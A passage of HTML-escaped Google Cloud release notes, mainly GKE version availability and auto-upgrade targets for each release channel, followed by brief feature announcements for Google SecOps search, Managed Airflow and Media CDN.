&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1353"&gt;1.35.3-gke.2190000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation in the Regular channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Regular channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1059000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1126000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1057000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Regular channel:
&lt;ul&gt;
&lt;li&gt;1.33.11-gke.1197000&lt;/li&gt;
&lt;li&gt;1.34.7-gke.1499000&lt;/li&gt;
&lt;li&gt;1.35.3-gke.2190000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt; is now the default version for cluster creation in the Rapid channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Rapid channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Rapid channel:
&lt;ul&gt;
&lt;li&gt;1.33.12-gke.1059000&lt;/li&gt;
&lt;li&gt;1.34.8-gke.1126000&lt;/li&gt;
&lt;li&gt;1.35.5-gke.1057000&lt;/li&gt;
&lt;li&gt;1.36.0-gke.2459000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1116000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1218000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1163000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1116000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1218000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1163000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation.&lt;/li&gt;
&lt;li&gt;The following versions are now available:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following node versions are now available:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2681000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.2074000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1729000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1166000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1278000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1241000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2684000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3009002&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.3070003&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1347"&gt;1.34.7-gke.1055000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Change&lt;/h3&gt;
&lt;h4 id="2026-r23-version-updates"&gt;(2026-R23) Version updates&lt;/h4&gt;
&lt;aside class="note"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Your clusters might not have these versions available.
Rollouts are already in progress when we publish the release notes, and can take
multiple days to complete across all Google Cloud zones.&lt;/aside&gt;
&lt;ul&gt;
&lt;li&gt;Version &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt; is now the default version for cluster creation in the Extended channel.&lt;/li&gt;
&lt;li&gt;The following versions are now available in the Extended channel:
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2558000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2681000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1967000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.2074000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1592000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1729000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1059000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1126000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1057000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;The following versions are no longer available in the Extended channel:
&lt;ul&gt;
&lt;li&gt;1.30.14-gke.2458000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.30.14-gke.2608000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.31.14-gke.1868000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.31.14-gke.1986000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.32.13-gke.1492000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.32.13-gke.1657000 is &lt;a href="https://docs.cloud.google.com/kubernetes-engine/versioning#patch-version-support"&gt;deprecated&lt;/a&gt; in the Extended channel. This version will be removed in 90 days, or at the end of support, if sooner.&lt;/li&gt;
&lt;li&gt;1.33.11-gke.1197000&lt;/li&gt;
&lt;li&gt;1.34.7-gke.1499000&lt;/li&gt;
&lt;li&gt;1.35.3-gke.2190000&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Clusters in this channel running the listed minor version have new general auto-upgrade targets. GKE can upgrade control planes and nodes to the following new versions with this release:
&lt;ul&gt;
&lt;li&gt;GKE upgrades clusters to the following new minor versions if there are no factors, such as &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or deprecated APIs, preventing upgrades:
&lt;ul&gt;
&lt;li&gt;1.29 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2530000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.30 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1942000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;GKE upgrades clusters to the following new patch versions if no minor version upgrade is available, or if the cluster has &lt;a href="https://cloud.google.com/kubernetes-engine/docs/concepts/maintenance-windows-and-exclusions#exclusions"&gt;maintenance exclusions&lt;/a&gt; or other factors preventing minor version upgrades:
&lt;ul&gt;
&lt;li&gt;1.30 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.30.md#v13014"&gt;1.30.14-gke.2530000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.31 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.31.md#v13114"&gt;1.31.14-gke.1942000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.32 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.32.md#v13213"&gt;1.32.13-gke.1551000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.33 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.33.md#v13312"&gt;1.33.12-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.34 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.34.md#v1348"&gt;1.34.8-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.35 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.35.md#v1355"&gt;1.35.5-gke.1000000&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;1.36 to &lt;a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG/CHANGELOG-1.36.md#v1360"&gt;1.36.0-gke.2459000&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Search for cases using SIEM Search&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps SIEM Search now provides robust capabilities for analyzing cases and case history alongside existing Unified Data Model (UDM) events and entities. This update allows security analysts to seamlessly correlate case details with other security telemetry within a single interface, streamlining workflows and accelerating incident response.&lt;/p&gt;
&lt;p&gt;Key Highlights:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Unified Search Experience&lt;/strong&gt;: Conduct searches across UDM events, entities, cases, and case history from a single SIEM Search interface.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Correlate SIEM and SOAR Data&lt;/strong&gt;: Effortlessly link case details and historical activities with security data, reducing context switching and improving investigation efficiency.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/search-and-search-case-history"&gt;Search cases and case history&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Investigate detections in Google SecOps Search&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps Search now supports querying, filtering, and analyzing system-generated detections. When searching on events or entities, matching detections will now appear in the &lt;strong&gt;Alerts and Detections&lt;/strong&gt; tab, providing a more holistic workflow for threat investigation.&lt;/p&gt;
&lt;p&gt;For more details, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/investigate-detections-in-search"&gt;Investigate detections in Search&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous Search APIs for large datasets&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps now supports asynchronous Search APIs that let you perform
long-running queries without blocking your applications. This is ideal for 
searches that return a large volume of results.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Non-blocking queries&lt;/strong&gt;: Initiate searches and receive an operation ID to
track progress, so your application remains responsive.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Handle large result sets&lt;/strong&gt;: Retrieve up to 1 million results from data
sources including Unified Data Model (UDM) events, data tables, and Entity
Context Graph (ECG).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Paginated results&lt;/strong&gt;: View results efficiently in manageable pages.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/search-lro-api"&gt;Asynchronous Search APIs&lt;/a&gt;
and &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/udm-search#resultLimitsDataSources"&gt;Result limits for data sources&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Google SecOps SIEM&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;[Spotlight Feature] Investigate detections in Google SecOps Search&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps Search now supports querying, filtering, and analyzing system-generated detections. When searching on events or entities, matching detections will now appear in the &lt;strong&gt;Alerts and Detections&lt;/strong&gt; tab, providing a more holistic workflow for threat investigation.&lt;/p&gt;
&lt;p&gt;For more details, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/investigate-detections-in-search"&gt;Investigate detections in Search&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Asynchronous Search APIs for large datasets&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Google SecOps now supports asynchronous Search APIs that let you perform
long-running queries without blocking your applications. This is ideal for 
searches that return a large volume of results.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Non-blocking queries&lt;/strong&gt;: Initiate searches and receive an operation ID to
track progress, so your application remains responsive.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Handle large result sets&lt;/strong&gt;: Retrieve up to 1 million results from data
sources including Unified Data Model (UDM) events, data tables, and Entity
Context Graph (ECG).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Paginated results&lt;/strong&gt;: View results efficiently in manageable pages.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/search-lro-api"&gt;Asynchronous Search APIs&lt;/a&gt;
and &lt;a href="https://docs.cloud.google.com/chronicle/docs/investigation/udm-search#resultLimitsDataSources"&gt;Result limits for data sources&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Managed Service for Apache Airflow&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;New Managed Airflow (Gen 2) environments created while the Restrict Endpoint
Usage organization policy is active now use regional endpoints for services
like Cloud Storage, Cloud Logging, Pub/Sub, and Data Lineage. For more
information, see
&lt;a href="https://docs.cloud.google.com/composer/docs/composer-2/configure-restrict-endpoint-usage-environments"&gt;Configure environments with Restrict Endpoint Usage policy&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Media CDN&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;The maximum cacheable object size for Media CDN can be increased up to 1 TiB. To
request a limit increase for your project, contact your Google support
representative. This feature is &lt;strong&gt;Generally Available&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/media-cdn/quotas"&gt;Quotas and limits&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;Media CDN lets you identify the country codes of the edge caches serving client
requests. This feature is &lt;strong&gt;Generally Available&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;For more information, see &lt;a href="https://docs.cloud.google.com/media-cdn/docs/custom-headers#header-variables"&gt;Custom headers&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Policy Intelligence&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
